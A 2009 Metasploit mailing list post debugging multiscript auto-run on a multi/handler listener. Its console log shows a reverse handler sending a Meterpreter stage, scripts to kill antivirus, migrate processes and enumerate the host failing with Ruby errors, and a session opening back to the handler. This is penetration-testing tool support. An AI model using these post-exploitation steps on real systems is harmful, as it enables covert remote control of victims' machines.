Metasploit mailing list archives

multihandler rc :?


From: netevil at hackers.it (netevil)
Date: Thu, 01 Oct 2009 15:37:15 +0200

Carlos Perez wrote:
In the multiscript ise the -s option and put the script with option one 
per line onthe text file you call, I will remove the option of passing 
the list of scripts thru a delimited string do to the way the option are 
being parsed. Let me know if it works that way

.. in the rc file i have 3 lines for those scripts calls!

msf exploit(handler) > set AutoRunScript multiscript.rb "-s AliveAutopsy.rc"
AutoRunScript => multiscript.rb -s AliveAutopsy.rc
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (719360 bytes)
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running command run killav.rb
[-] Error: NameError undefined local variable or method `shell' for 
#<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run killav.rb
[*]     running command run migrate.rb
[-] Error: NameError undefined local variable or method `shell' for 
#<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run migrate.rb
[*]     running command run winemun.rb
[-] Error: NameError undefined local variable or method `shell' for 
#<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run winemun.rb
[*]     running command
[-] Error: NameError undefined local variable or method `shell' for 
#<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script:
[*] Meterpreter session 1 opened (192.253.128.100:53 -> 
192.253.128.103:1055)


Current thread: